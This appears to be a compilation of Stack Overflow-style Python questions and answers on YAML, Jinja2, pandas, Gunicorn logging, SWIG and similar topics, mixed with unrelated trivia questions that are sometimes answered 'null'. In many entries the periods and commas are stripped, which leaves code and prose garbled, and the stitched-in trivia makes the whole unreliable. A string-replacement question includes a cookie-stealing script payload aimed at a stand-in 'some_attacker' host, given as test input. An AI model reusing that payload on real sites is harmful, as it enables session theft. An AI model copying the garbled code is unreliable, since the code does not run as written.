Accessing nested YAML mappings with jinja2 I have recently started using YAML and jinja2 I am having trouble understanding why I need to reference the entire structure of my YAML mapping in the jinja2 template I have the following YAML file ````--- PROVIDERS: PROV1: int: ge-0/1/1 ipv4: 10 0 1 1/30 PROV2: int: ge-0/1/2 ipv4: 10 0 1 2/30 ```` and this is my jinja2 template ````{%- for provider in PROVIDERS %} {{ provider }} {{ PROVIDERS[provider] int }} <-- why not provider int {{ PROVIDERS[provider] ipv4 }} <-- why not provider ipv4 {%- endfor %} ```` Parsing with pyyaml gives me the (expected) output ````PROV2 ge-0/1/2 10 0 1 2/30 PROV1 ge-0/1/1 10 0 1 1/30 ```` However why must I use `PROVIDERS[provider] int`? `provider int` does not work Additionally I was wondering if I could make this a list of mappings instead of a nested mapping: ````--- PROVIDERS: - PROV1: int: ge-0/1/1 ipv4: 10 0 1 1/30 - PROV2: int: ge-0/1/2 ipv4: 10 0 1 2/30 ```` I have tried to do so but the jinja2 template no longer produced the desired output
There are two things to consider here:

- What Python data structure is constructed from your YAML document?
- How can your template reference the elements of that data structure?

Answering point 1 is easy:

````
>>> import yaml
>>> from pprint import pprint
>>> p1 = yaml.load("""
... ---
... PROVIDERS:
...   PROV1:
...     int: ge-0/1/1
...     ipv4: 10.0.1.1/30
...   PROV2:
...     int: ge-0/1/2
...     ipv4: 10.0.1.2/30
... """)
>>> pprint(p1)
{'PROVIDERS': {'PROV1': {'int': 'ge-0/1/1', 'ipv4': '10.0.1.1/30'},
               'PROV2': {'int': 'ge-0/1/2', 'ipv4': '10.0.1.2/30'}}}
````

You have a dictionary with a single item whose key is `'PROVIDERS'` and whose value is a dictionary with the keys `'PROV1'` and `'PROV2'`, each of whose values is a further dictionary. That is a more deeply nested structure than you need (more on which later), but now that we can see your data structure, we can work out what is going on with your template. This line:

````
{%- for provider in PROVIDERS %}
````

iterates over the <strong>keys</strong> of `PROVIDERS` (which, given your output, is obviously the second-level nested dictionary which is the value for the key `'PROVIDERS'` in your top-level dictionary). Since what you are iterating over are the keys, you then need to use those keys to get at the associated values:

````
{{ PROVIDERS[provider].int }}
{{ PROVIDERS[provider].ipv4 }}
````

A more straightforward YAML document for your purposes would be this:

````
---
- id: PROV1
  int: ge-0/1/1
  ipv4: 10.0.1.1/30
- id: PROV2
  int: ge-0/1/2
  ipv4: 10.0.1.2/30
````

Note that we have ditched the redundant single-item mapping and replaced the second-level mapping of mappings with a list of mappings. Again, we can check that:

````
>>> p2 = yaml.load("""
... ---
... - id: PROV1
...   int: ge-0/1/1
...   ipv4: 10.0.1.1/30
... - id: PROV2
...   int: ge-0/1/2
...   ipv4: 10.0.1.2/30
... """)
>>> pprint(p2)
[{'int': 'ge-0/1/1', 'ipv4': '10.0.1.1/30', 'id': 'PROV1'},
 {'int': 'ge-0/1/2', 'ipv4': '10.0.1.2/30', 'id': 'PROV2'}]
````

Here is how your template could use this data structure:

````
{%- for provider in PROVIDERS %}
{{ provider.id }}
{{ provider.int }}
{{ provider.ipv4 }}
{%- endfor %}
````

Obviously you will need to modify the code which supplies `PROVIDERS` to the template, since it is now the top-level list represented by the entire YAML document rather than a dictionary nested inside it.
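For completeness, here is a minimal sketch of rendering the second structure end to end. The file name and the template string are my assumptions, not part of the original post:

````
import yaml
from jinja2 import Template

# Hypothetical file holding the list-of-mappings YAML shown above.
with open('providers.yml') as f:
    providers = yaml.safe_load(f)   # a list of dicts with 'id', 'int', 'ipv4'

template = Template(
    "{%- for provider in PROVIDERS %}\n"
    "{{ provider.id }} {{ provider.int }} {{ provider.ipv4 }}\n"
    "{%- endfor %}"
)
print(template.render(PROVIDERS=providers))
````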
blobkey from blobstore google apps engine python How do you return the blob key from a blob store? and subsequently return the image URL? Example code: ````class Next(webapp RequestHandler): def get(self): userTable_name=self request get('userTable_name') data = db GqlQuery("SELECT * " "FROM userTable " "WHERE ANCESTOR IS :1 " "ORDER BY date DESC LIMIT 10" userTable_key(userTable_name)) self response headers['Content-Type'] = 'text/plain' for user in data: blobURL = get_serving_url(user imageblob key() size=None crop=False) self response out write(blobURL) ```` I am using a GqlQuery to return a set of Blobs (i e user imageblob) and for each blob i need to determine the BlobKey From what I can tell "user imageblob key()" does not return the blobkey ?
Worked it out! As it turns out, I was confusing "adding an image to the datastore as a blob" with adding an image to the blobstore:

<blockquote>
a BlobReferenceProperty references an object uploaded and stored in the blobstore, while a BlobProperty stores blob data directly in the datastore; see: <a href="http://stackoverflow.com/questions/3864045/how-to-use-get-serving-url-in-appengine">How to use get_serving_url in appengine?</a>
</blockquote>

Hence `get_serving_url()` and `user.imageblob.key()` were incorrectly pointing to the datastore as opposed to the blobstore. For examples of adding images to the blobstore, see: <a href="http://code.google.com/appengine/docs/python/blobstore/overview.html" rel="nofollow">http://code.google.com/appengine/docs/python/blobstore/overview.html</a>
Import of csv file from linux to windows MySQL

I need a shell script that imports the latest ".csv" file into MySQL. My case is: the ".csv" files are stored in a path on a Linux PC, and the import needs to be done into MySQL on Windows, i.e. import the latest ".csv" file from Linux into the Windows MySQL instance. I would appreciate a prompt response.
Shell script, ok:

````
step 1: sort the csv files by reverse date
        ls --time-style=full-iso -l | grep -E "*.csv" | sort -k5 -k6 -r
step 2: the first file is the latest file
step 3: there should be some tool to import a csv file into mysql
````

Windows or Linux is not the problem; you can also access Windows's MySQL from Linux. Just connect to the ip:port address, then do whatever you want.
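As a hedged Python sketch of those steps (the export path, host, credentials, database and table names are all placeholders; it assumes the `mysql` client is installed on the Linux box and that the server permits `LOAD DATA LOCAL`):

````
import glob
import os
import subprocess

# Step 1/2: find the newest .csv in the export directory.
latest = max(glob.glob('/data/exports/*.csv'), key=os.path.getmtime)

# Step 3: hand it to the MySQL server running on the Windows host.
query = ("LOAD DATA LOCAL INFILE '%s' INTO TABLE mytable "
         "FIELDS TERMINATED BY ',' LINES TERMINATED BY '\\n'" % latest)
subprocess.check_call(['mysql', '--local-infile=1', '-h', 'windows-host',
                       '-u', 'user', '-pPASSWORD', 'mydb', '-e', query])
````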
Reading CSV files in Pandas and/or Tableau With Diefferent Row Sizes I have a csv file which I want to read with Pandas library in Python In this table when we encounter a new item (e g items Nr 1393 or 1654 in the example below) we first have a 4 column row metadata and after that several 100 column rows as real data associated to that item Then it happens again for the next item and so on The table is like this: ````1 1393 0 0 1 1393 1 22 55 63 1 1393 5 32 43 163 2 1654 0 0 2 1654 8 95 96 142 2 1654 21 31 364 9 ```` So the problems are: - Some rows have different sizes than others - We do not have headers and can not create it as the first row has 4 entries and second one 100 entries - My CSV file is huge (about 10G)! Any suggestion which helps me to organize my data in Pandas or any other Python library is highly appreciated PS: BY THE WAY anybody knows how to manage it in Tableau?
When data does not fit an existing `pandas` reader, you can create your own generator and populate the dataframe with `from_records`. Lacking details on how these various items should be related, I wrote an example that just adds the latest metadata to the front of each row:

````
import pandas as pd

def my_data_generator(fp):
    metadata = []
    for line in fp:
        data = line.strip().split(',')
        if len(data) == 4:
            metadata = data
        elif not metadata:
            raise ValueError("csv file did not start with metadata")
        elif data:
            yield metadata + data

df = pd.DataFrame.from_records(my_data_generator(open('somefile.csv')))
print(df)
````
How to write specific length lines of a file? I have this sequences (over 9000) like this: ````&gt;TsM_000224500 MTTKWPQTTVTVATLSWGMLRLSMPKVQTTYKVTQSRGPLLAPGICDSWSRCLVLRVYVDRRRPGGDGSLGRVAVTVVETGCFGSAASFSMWVFGLAFVVTIEEQLL &gt;TsM_000534500 MHSHIVTVFVALLLTTAVVYAHIGMHGEGCTTLQCQRHAFMMKEREKLNEMQLELMEMLMDIQTMNEQEAYYAGLHGAGMQQPLPMPIQ &gt;TsM_000355900 MESGEENEYPMSCNIEEEEDIKFEPENGKVAEHESGEKKESIFVKHDDAKWVGIGFAIGTAVAPAVLSGISSAAVQGIRQPIQAGRNNGETTEDLENLINSVEDDL ```` The lines containing the ">" are the ID's and the lines with the letters are the amino acid (aa) sequences I need to delete (or move to another files) the sequences below 40 aa and over 4000 aa Then the resulting file should contain only the sequences within this range (>= 40 aa and <= 4K aa) I have tried writing the following script: ````def read_seq(file_name): with open(file_name) as file: return file read() split('\n')[0:] ts = read_seq("/home/tiago/t_solium/ts_phtm0less txt") tsf = open("/home/tiago/t_solium/ts_secp-404k" 'w') for x in range(len(ts)): if ([x][0:1] != '&gt;'): if (len([x]) &gt; 40 or len([x]) < 4000): tsf write('%s\n'%(x)) tsf close() print "OK!" ```` I have done some modifications but all I am getting are empty files or with all the 9000 sequences
In your for loop, `x` is an iterating integer due to using `range()` (i.e. `0, 1, 2, 3, 4, ...`). Try this instead: `for x in ts:`. This will give you each element in `ts` as `x`.

Also, you do not need the brackets around `x`; Python can iterate over the characters in strings on its own. When you put brackets around a string, you put it into a list, and thus if you tried, for example, to get the second character in `x` with `[x][1]`, Python will try to get the second element of the list that you put `x` in and will run into problems.

EDIT: To include IDs, try this. NOTE: I also changed `if (len(x) > 40 or len(x) < 4000)` to `if (len(x) > 40 and len(x) < 4000)`; using `and` instead of `or` will give you the result you are looking for.

````
for i, x in enumerate(ts):  # NEW: enumerate ts to get the index of every iteration (stored as i)
    if (x[0] != '>'):
        if (len(x) > 40 and len(x) < 4000):
            tsf.write('%s\n' % (ts[i-1]))  # NEW: write the ID found on the preceding line
            tsf.write('%s\n' % (x))
````
How to extract url GET parameter from <a> tag from the full html text So I have an html page It is full of various tags most of them have sessionid GET parameter in their href attribute Example: ```` <a href="struct_view_distrib asp?sessionid=11692390"&gt; <a href="SHOW_PARENT asp?sessionid=11692390"&gt; <a href="nakl_view asp?sessionid=11692390"&gt; <a href="move_sum_to_7300001 asp?sessionid=11692390&amp;mode_id=0"&gt; ```` So as you see sessionid is the same i just need to get it is value into variable no matter from which one: x=11692390 I am newbie in regex but google was not helpful Thanks a lot!
Parse your HTML with a DOM parsing library and use `getElementsByTagName('a')` to grab the anchors, iterate through them, use `getAttribute('href')`, and then extract the string. Then you can use regex, or split on `?`, to match/retrieve the session id.
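In Python, a minimal sketch of that approach could use BeautifulSoup instead of a raw DOM API (the variable `html` holding the page source is an assumption on my part):

````
from bs4 import BeautifulSoup
from urlparse import urlparse, parse_qs  # Python 2; use urllib.parse on Python 3

soup = BeautifulSoup(html, 'html.parser')
sessionid = None
for a in soup.find_all('a', href=True):
    # Parse the query string of each href and look for sessionid.
    qs = parse_qs(urlparse(a['href']).query)
    if 'sessionid' in qs:
        sessionid = qs['sessionid'][0]
        break
print(sessionid)  # e.g. '11692390'
````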
Why is Flask application not creating any logs when hosted by Gunicorn? I am trying to add logging to a web application which uses Flask When hosted using the built-in server (i e `python3 server py`) logging works When hosted using Gunicorn the log file is not created The simplest code which reproduces the problem is this one: ````#!/usr/bin/env python import logging from flask import Flask flaskApp = Flask(__name__) @flaskApp route('/') def index(): flaskApp logger info('Log message') print('Direct output') return 'Hello World\n' if __name__ == "__main__": logHandler = logging FileHandler('/var/log/demo/app log') logHandler setLevel(logging INFO) flaskApp logger addHandler(logHandler) flaskApp logger setLevel(logging INFO) flaskApp run() ```` The application is called using: ````gunicorn server:flaskApp -b :80 -w 4 --access-gfile /var/log/demo/access log --error-logfile /var/log/demo/error log ```` When doing a request to the home page of the site the following happens: - I receive the expected HTTP 200 "Hello World\n" in response - There is a trace of the request in `/var/log/demo/access log` - `/var/log/demo/error log` stays the same (there are just the boot events) - There is the "Direct output" line in the terminal - There is no '/var/log/demo/app log' If I create the file prior to launching the application the file is not modified Note that: - The directory `/var/log/demo` can be accessed (read write execute) by everyone so this is not the permissions issue - If I add `StreamHandler` as a second handler there is still no trace of the "Log message" message neither in the terminal nor in Gunicorn log files - Gunicorn is installed using `pip3 install gunicorn` so there should not be any mismatch with Python versions What is happening?
When you use `python3 server.py`, you are running the server.py script. When you use `gunicorn server:flaskApp ...`, you are running the gunicorn startup script, which then <strong>imports</strong> the module `server` and looks for the variable `flaskApp` in that module.

Since `server.py` is being imported, the `__name__` var will contain `"server"`, not `"__main__"`, and therefore your log handler setup code is not being run.

You could simply move the log handler setup code outside of the `if __name__ == "__main__":` stanza. But ensure that you keep `flaskApp.run()` in there, since you do <em>not</em> want that to be run when gunicorn imports `server`.

More about <a href="http://stackoverflow.com/questions/419163/what-does-if-name-main-do">what does `if __name__ == "__main__":` do?</a>
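As a sketch (not the poster's exact file), the reordered `server.py` could look like this, with the handler configured at import time and only `run()` guarded:

````
import logging
from flask import Flask

flaskApp = Flask(__name__)

# Runs both under `python3 server.py` and when gunicorn imports this module.
logHandler = logging.FileHandler('/var/log/demo/app.log')
logHandler.setLevel(logging.INFO)
flaskApp.logger.addHandler(logHandler)
flaskApp.logger.setLevel(logging.INFO)

@flaskApp.route('/')
def index():
    flaskApp.logger.info('Log message')
    return 'Hello World\n'

if __name__ == "__main__":
    # Only the built-in development server belongs here.
    flaskApp.run()
````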
Getting Started with SWIG and Visual Studio I am trying to create my first SWIG python DLL with Visual Studio 2010 using an example I downloaded from swig org I am running Windows professional 64-bit I downloaded swigwin-2 0 7 and unzipped it I have followed the instructions <a href="http://stackoverflow com/questions/5969173/how-to-swig-in-vs2010">here</a> and <a href="http://stackoverflow com/questions/11693047/how-to-create-a-dll-with-swig-from-visual-studio-2010">here</a> and in both cases the wrap file gets built but the project build fails The linker complains about 56 unresolved external symbols all with names something like _<them>imp</them>_PyBytes_AsStringAndSize or _<them>imp</them>_PyExc_RuntimeError I have tried this using my python 2 7 installation as well as my python 3 2 installation with similar results Do I have to build swig from the source for my platform? I have spent the last 6 hours or so on this and I am nonplussed
Following the instructions <a href="http://stackoverflow com/questions/11693047/how-to-create-a-dll-with-swig-from-visual-studio-2010">here</a> using the `simple` Python example from SWIG Windows 7 64-bit and Python 2 7 32-bit I did not see the OP's specific errors I saw: ````1&gt;example_wrap obj : error LNK2019: unresolved external symbol "int __cdecl gcd(int int)" (?gcd@@YAHHH@Z) referenced in function __wrap_gcd 1&gt;example_wrap obj : error LNK2001: unresolved external symbol "double Foo" (?Foo@@3NA) ```` Two changes had to be made due to the `simple` example being C source instead of C++: - Do not use the `-c++` switch on the `swig` command line (step 13 of the instructions) - The generated file is now `example_wrap c` not `example_wrap cxx` (referred to in steps 14 and 19 of the instructions) Alternatively just rename `example c` to `example cpp` in this case before following the instructions and they should work as is
How does one use the VSCode debugger to debug a Gunicorn worker process? I have a GUnicorn/Falcon web service written in Python 3 4 on Ubuntu 14 04 I would like to use the VSCode debugger to debug this service I currently start the process with the command ````/usr/local/bin/gunicorn --config /webapps/connects/routerservice_config py routerservice:api ```` which starts routerservice py using the config file routerservice_config py I have workers set to 1 in the config to keep it simple I have installed the Python extension to VSCode so I have the Python debugging tools So how do I attach to the GUnicorn worker process or have VSCode run the startup command and auto attach Thanks Greg
I am the author of the extension You could try the following: <a href="https://github com/DonJayamanne/pythonVSCode/wiki/Debugging:-Remote-Debuging" rel="nofollow">https://github com/DonJayamanne/pythonVSCode/wiki/Debugging:-Remote-Debuging</a> - Add the following code into your routerservice_config py (or similar python startup file) ` import ptvsd ptvsd enable_attach("my_secret" address = ('0 0 0 0' 3000)) ` - Start the above application - Go into VS Code and then attach the debugger FYI: - This requires you to include the ptvsd package and configure it in your application - The plan is to add the feature to attach the debugger to any python process in the future (hopefully near future)
In which year did the last permanent settler arrive at the islands?
null
Ashkenazi families that left Northern Italy went where?
Central and eventually Eastern Europe
Validation loop error I am trying to validate my python script: ````def DOBSearch(): loop = True while loop == True: try: DOBsrch = int(input("Please enter the birth month in a two digit format e g 02: ")) for row in BkRdr: DOB = row[6] day month year = DOB split("/") if DOBsrch == int(month): print("W") surname = row[0] firstname = row[1] print(firstname " " surname) addrsBk close loop = False else: print("1 That was an invalid choice please try again ") except ValueError: print("That was an invalid choice please try again ") ```` However when I try to test the script I find there is a bug/error as I get the following outputs: ````&gt;&gt;&gt; DOBSearch() Please enter the birth month in a two digit format e g 02: 2345 1 That was an invalid choice please try again 1 That was an invalid choice please try again 1 That was an invalid choice please try again 1 That was an invalid choice please try again 1 That was an invalid choice please try again 1 That was an invalid choice please try again Please enter the birth month in a two digit format e g 02: 23456 Please enter the birth month in a two digit format e g 02: 4321 Please enter the birth month in a two digit format e g 02: 2345 Please enter the birth month in a two digit format e g 02: yrsdhctg That was an invalid choice please try again Please enter the birth month in a two digit format e g 02: 02 Please enter the birth month in a two digit format e g 02: ```` here is the CSV file: ````Jackson Samantha 2 Heather Row Basingstoke RG21 3SD 01256 135434 23/04/1973 sam jackson@hotmail com Vickers Jonathan 18 Saville Gardens Reading RG3 5FH 01196 678254 04/02/1965 the_man@btinternet com Morris Sally The Old Lodge Hook RG23 5RD 01256 728443 19/02/1975 smorris@fgh co uk Cobbly Harry 345 The High Street Guildford GU2 4KJ 01458 288763 30/03/1960 harry cobbly@somewhere org uk Khan Jasmine 36 Hever Avenue Edenbridge TN34 4FG 01569 276524 28/02/1980 jas khan@hotmail com Vickers Harriet 45 Sage Gardens Brighton BN3 2FG 01675 662554 04/04/1968 harriet vickers@btinternet com ````
I think there are two errors in your code.

The first is that you are printing your first error message repeatedly. This is because the `print` line is inside the `for` loop that checks against each row from your CSV file, so each row that does not match produces the error message. To fix that, you should probably move the `print` statement up a level, to be called after the `for` loop ends.

The second issue is that `BkRdr`, which you loop on, appears to be an iterator, not a sequence that you can repeatedly iterate. This is why every numerical entry after the first fails silently: the `for` loop does not do anything at all in those cases! To fix this, you probably need to change other code you have not shown so that your CSV file gets read into a list rather than only an iterator. (Or, alternatively, you could rewind the file, or close and reopen it.)
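A minimal sketch of both fixes, loosely adapted from the question's code (the CSV file name is a placeholder, since that part of the setup was not shown):

````
import csv

# Read the whole CSV into a list once, so it can be searched repeatedly.
with open('addressbook.csv') as addrsBk:   # hypothetical file name
    BkRdr = list(csv.reader(addrsBk))

def DOBSearch():
    while True:
        try:
            DOBsrch = int(input("Please enter the birth month in a two digit format e.g. 02: "))
        except ValueError:
            print("That was an invalid choice, please try again.")
            continue
        matches = [row for row in BkRdr if int(row[6].split("/")[1]) == DOBsrch]
        if matches:
            for row in matches:
                print(row[1], row[0])   # firstname surname
            return
        # Only printed once, after the whole file has been checked.
        print("1. That was an invalid choice, please try again.")
````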
Does setup py's extras_require keyword support comma-separated extras? Setuptools let us you list requirements for optional features ````# mypackage 'extras_require' : { 'PDF' : ['reportlab'] 'DOCX' : ['docxlib'] } ```` and another package can specify `'requires' : [ 'mypackage[PDF]' ]` If another package wants to require more than one extra from the first package can it ask for `'requires' : [ 'mypackage[PDF DOCX]' ]`?
from: <a href="http://peak.telecommunity.com/DevCenter/setuptools#declaring-dependencies" rel="nofollow">http://peak.telecommunity.com/DevCenter/setuptools#declaring-dependencies</a>

setuptools and pkg_resources use a common syntax for specifying a project's required dependencies. This syntax consists of a project's PyPI name, optionally followed by a comma-separated list of "extras" in square brackets, optionally followed by a comma-separated list of version specifiers.

So your answer is yes.
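For illustration, a sketch of the downstream package's setup.py using the hypothetical package names from the question (spelled with `install_requires`, the usual form of the question's `requires`):

````
from setuptools import setup

setup(
    name='otherpackage',
    version='0.1',
    # Pull in mypackage together with both of its optional feature sets.
    install_requires=['mypackage[PDF,DOCX]'],
)
````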
Why is function not working? Trying to replace words in string I am trying to replace some key words in a string Here is my function: ````def clean_code(input): input replace('<script&gt;' " ") input replace('</script&gt;' " ") input replace('<a href&gt;' " ") input replace('</a&gt;' " ") input replace('&gt;' "&amp;gt;") input replace('&gt;' "&amp;lt;") return input ```` and here is my other code and the string: ````string1 = "This blog is STUPID! &gt;\n" \ "<script&gt;document location='http://some_attacker/cookie cgi?"\ " document cookie </script&gt;" print '\nstring1 cleaned of code' print '------------------------' print clean_code(string1) ```` My output is as follows and I am not sure why nothing has changed ````string1 cleaned of code ------------------------ This blog is STUPID! &gt; <script&gt;document location='http://some_attacker/cookie cgi? document cookie </script&gt; ````
Python strings are <strong>immutable</strong>:

````
input = input.replace('<script>', " ")
input = ...
````

See the <a href="http://docs.python.org/library/string.html#string.replace">`replace` documentation</a>:

<blockquote>
<strong>Return a copy of string str</strong> with all occurrences of substring old replaced by new.
</blockquote>
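A minimal reworking of the question's function along these lines might look like the following. This is only a sketch of the reassignment fix, not a safe way to sanitize HTML (use a real sanitizer for that), and the sample string is simplified:

````
def clean_code(text):
    # str.replace returns a new string, so reassign the result each time.
    for target in ('<script>', '</script>', '<a href>', '</a>'):
        text = text.replace(target, " ")
    text = text.replace('<', "&lt;").replace('>', "&gt;")
    return text

string1 = "This blog is STUPID! <script>document.location='http://some_attacker/cookie.cgi?' + document.cookie</script>"
print(clean_code(string1))
````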
urllib2 encoding issue This is my example script: ````import urllib2 re response = urllib2 urlopen('http://domain tld/file') data = response read() # Normally displays "the emoticon <3 is blah blah" pattern = re search('(the emoticon )( *)( is blah blah)' data) result = pattern group(2) # result should contain "<3" now print 'The result is ' result # prints "&amp;lt;3" because not encoded ```` As you can see I am obtaining a page and trying to get a string out of it but it is not encoded correctly as I am not sure what to add to this script o make the end result correct Could anyone point out what I am doing wrong?
try this:

````
>>> import HTMLParser
>>> h = HTMLParser.HTMLParser()
>>> h.unescape('wer&amp;wer')
u'wer&wer'
````
Writing to numpy array from dictionary I have a dictionary of file header values (time number of frames year month etc) that I would like to write into a numpy array The code I have currently is as follows: ```` arr=np array([(k )+v for k v in fileheader iteritems()] dtype=["a3 a i4 i4 i4 i4 f8 i4 i4 i4 i4 i4 i4 a10 a26 a33 a235 i4 i4 i4 i4 i4 i4"]) ```` But I get an error "can only concatenate tuple (not "int") to tuple Basically the end result needs to be arrays storing the overall file header info (which is 512 bytes) and each frame's data (header and data 49408 bytes for each frame) Is there an easier way to do this? Edit: To clarify (for myself as well) I need to write in the data from each frame of the file to an array I was given matlab code as a base Here is a rough idea of the code given to me: ````data frame=zeros([512 96]) frame=uint8(fread(fid [data numbeams 512]) 'uint8')) data frame=frame ```` How do I translate the "frame" into python?
The problem seems to be that `v` is an `int` rather than a `tuple` Try: ````arr=np array([(k v) for k v in fileheader iteritems()] dtype=["a3 a i4 i4 i4 i4 f8 i4 i4 i4 i4 i4 i4 a10 a26 a33 a235 i4 i4 i4 i4 i4 i4"]) ````
How do I find missing dates in a list of sorted dates? In Python how do I find all the missing days in a sorted list of dates?
Sort the list of dates and iterate over it remembering the previous entry If the difference between the previous and current entry is more than one day you have missing days Here is one way to implement it: ````from datetime import date timedelta from itertools import tee izip def pairwise(iterable): "s > (s0 s1) (s1 s2) (s2 s3) " a b = tee(iterable) b next() return izip(a b) def missing_dates(dates): for prev curr in pairwise(sorted(dates)): i = prev while i timedelta(1) < curr: i = timedelta(1) yield i dates = [ date(2010 1 8) date(2010 1 2) date(2010 1 5) date(2010 1 1) date(2010 1 7) ] for missing in missing_dates(dates): print missing ```` Output: ````2010-01-03 2010-01-04 2010-01-06 ```` Performance is O(n*log(n)) where n is the number of days in the span when the input is unsorted As your list is already sorted it will run in O(n)
How use PyQt without GUI? I want create python server application using `PyQt4` without GUI ( signal/slots threads process and other core patterns ) How i can create this?
If you need the Qt event loop without a GUI, you can use `QCoreApplication` instead of `QApplication`: <a href="http://pyqt.sourceforge.net/Docs/PyQt4/qcoreapplication.html" rel="nofollow">http://pyqt.sourceforge.net/Docs/PyQt4/qcoreapplication.html</a>

From the <a href="http://pyqt.sourceforge.net/Docs/PyQt4/qcoreapplication.html#details" rel="nofollow">docs</a>:

<blockquote>
The QCoreApplication class provides an event loop for console Qt applications. This class is used by non-GUI applications to provide their event loop. For non-GUI applications that use Qt, there should be exactly one QCoreApplication object. For GUI applications, see QApplication.

QCoreApplication contains the main event loop, where all events from the operating system (e.g. timer and network events) and other sources are processed and dispatched. It also handles the application's initialization and finalization, as well as system-wide and application-wide settings.
</blockquote>
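A minimal PyQt4 sketch of a GUI-less event loop, just to illustrate the idea (the timer callback is an arbitrary placeholder; a real server would hook up sockets, threads or other signal/slot sources here):

````
import sys
from PyQt4 import QtCore

def tick():
    print('working without a GUI')

app = QtCore.QCoreApplication(sys.argv)

# Timers, sockets and signal/slot connections all run inside this event loop.
timer = QtCore.QTimer()
timer.timeout.connect(tick)
timer.start(1000)  # fire every second

sys.exit(app.exec_())
````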
best way to store code for later execution (python) I have some tasks stored in db for later execution For example i can fix task of sending email And by cron exec task (send it) I search for best way to store code in db for later execution For ex store it in raw string of python code and than do eval but also i must store relative imports here for example for send email i must fix string like this: s = "from django core mail import send_mail\n send_mail('subj' 'body' 'email@box ru' ['email1@box ru'] fail_silently=False)" and later eval any ideas to do it best way or mb better pattern for this kind of task?
I would not use this solution at all I would create a different handler for each task (sending a mail deleting a file etc) Storing code in this manner is hackish <strong>EDIT</strong> An example would be creating your own format for handlers For example each line one handler in this format: ````handlername;arg1;arg2;arg3;arg4 ```` Next you use python to read out the lines and parse them For example this would be a stored line: ````sendmail;nightcracker@nclabs org;subject;body ```` Which would be parsed like this: ````for line in database: handler *args = line split(";") if handler == "sendmail": recipient subject body = args[:3] # do stuff elif handler == "delfile": #etc ````
What school is Philip Hamburger disassociated with?
null
MongoAlchemy ObjectIdField resolution If I have a Model that contains an ObjectIdField to another model I would normally (django) use a `property` to create a getter and the reference would be transparent in usage Like so: ````class Image(db Document): name_full = db StringField(required=True) name_thumb = db StringField(required=False) source = db StringField(required=False) class Product(db Document): name = db StringField() description = db StringField(required=False) image_id = db ObjectIdField(required=False) def _get_image(self): try: return db query(Image) filter(mongo_id=self image_id)[0] except IndexError: return None image = property(_get_image) ```` Though in practice I get this error when trying to access it from a template: ````<img src="{{ url_for('static' filename='images/products/'+product image name_thumb) }}"&gt; UndefinedError: 'app models Product object' has no attribute 'image' ```` Am I going about this the right way?
Answering my own question here It seems that my mistake was in the function itself not the declaration of the property Once I used a `session` instead of `db` it started working I also shortened the property declaration to just use `@property` instead ````from mongoalchemy session import Session session = Session connect('flask-test') @property def image(self): try: return session query(Image) filter({"mongo_id":self image_id})[0] except IndexError: return None ````
Python: Tkinter: Break out of a button command call Is it possible in Tkinter to break up to the callback on a button I have a segment of code that if the user makes a mistake will cause an error in a specific part of it however it is within a for loop nested in another for loop and a while loop and can be either 2 or 3 functions deep (with the return of these functions being operated on) What I would like to do would be to return to the mainloop() when this error is found So the code looks a bit like: ````from Tkinter import * def func_call(val_list): y = [] for nn in range(len(val_list)): if val_list[nn] < 0: print('You entered a value that was too low ') break else: y append(val_list[nn]+5) return(y) def Button_callback(value): val_list = [value value-1 value-2 value-3] y = func_call(val_list) for nn in range(len(val_list)): print(y[nn]) root = Tk() Button(root text='Press me' command=lambda: Button_callback(1)) grid(row=0 column=0) root mainloop() ```` What this does is identifies that the value is too low and then breaks out the for loop and then returns the variable "y" to the previous function which then promptly puts out an error because it expects "y" to be the same length as "val_list" What I would like it to do is to effectively return to the button press so break out of both "func_call" and "Button_callback" with only "You entered a value that was too low " as an error message Any suggestions?
This problem does not have much to do with Tkinter it is just a normal control-flow question Typically the way you handle a situation like this where you want an inner function to stop all processing is to throw an exception since an exception will propagate up until something catches it For example: ````def func_call(val_list): if val_list[nn] < 0: raise ValueError("value too low") def Button_callback(value): try: y = func_call(val_list) except ValueError: return ````
Avoidance of unwholesome actions and use of positive actions is called what?
sīla
How to manually change a colormap in python/matplotlib I want to use the colormap `rainbow` in an image using `imshow` It works perfectly but I want to redefine the color for the value `0` Instead of violete I want to use white I want to do this only for the value zero all other values can stay with the default values in the colormap Any idea how to do this <strong>without</strong> having to edit the colormap manually?
You can also use `set_under` which I think makes more semantic sense than using `set_bad` ````my_cmap = matplotlib cm get_cmap('rainbow') my_cmap set_under('w') imshow(np arange(25) reshape(5 5) interpolation='none' cmap=my_cmap vmin= 001) ```` You can tweak the colorbar to also show the 'under' (and the symmetric 'over') color using the kwarg `extend` see <a href="http://matplotlib org/examples/api/colorbar_only html">example</a> and <a href="http://matplotlib org/api/pyplot_api html#matplotlib pyplot colorbar">docs</a> For an answer to a duplicate with more complete examples see <a href="https://stackoverflow com/questions/25432654/how-to-create-matplotlib-colormap-that-treats-one-value-specially?noredirect=1#comment39706467_25432654">How to create matplotlib colormap that treats one value specially?</a>
First Last Next ordering in exporting CSV Python I have a CSV of items and values and a representation of it would look something like this: ````foo 569 bar 9842 asdasd 98 poiqweu 7840 oiasd 4 poeri 145 sacodiw 55 aosdwr 855 9523 60 a52sd 5500 sdcw 415 0932 317 ```` I want to export to three CSVs such that they receive items from the master CSV in the order: highest lowest next highest next lowest etc CSV1 should be: ````bar 9842 oiasd 4 poiqweu 7840 sacodiw 55 ```` And so on for the other two CSVs For bonus what I <them>really</them> want to do is create three CSVs of 90 items each from a master of 270 such that each of the three are as close to the same sum of values as each other as possible I assume there is a better way than my simplistic (and highly assumptive) method How would I go about this in my python script that I am already using (which includes both CSV and pandas if the latter is any help)?
You can use the following building blocks to solve the problem (it should not be hard to take it from here).

Use <a href="http://pandas.pydata.org/" rel="nofollow">pandas</a> to load and sort:

````
import pandas as pd

df = pd.read_csv('test.csv', names=['name', 'count'])
df_largest = df.sort(columns=['count'], ascending=False)   # highest first
df_smallest = df.sort(columns=['count'])                   # lowest first

largest_1 = df_largest['count'][0:-1:2].values
largest_2 = df_largest['count'][1:-2:2].values
smallest_1 = df_smallest['count'][0:-1:2].values
smallest_2 = df_smallest['count'][1:-2:2].values
````

and then <a href="http://stackoverflow.com/questions/11125212/interleaving-lists-in-python">izip</a> to interleave elements between pairs of lists:

````
from itertools import chain, izip
result = list(chain.from_iterable(izip(list_a, list_b)))
````
How can I remove duplicate words in a string with Python? Following example: ````string1 = "calvin klein design dress calvin klein" ```` How can I remove the second two duplicates `"calvin"` and `"klein"`? The result should look like ````string2 = "calvin klein design dress" ```` only the second duplicates should be removed and the sequence of the words should not be changed!
You can use a set to keep track of already processed words:

````
words = set()
result = ''
for word in string1.split():
    if word not in words:
        result = result + word + ' '
        words.add(word)
print result
````
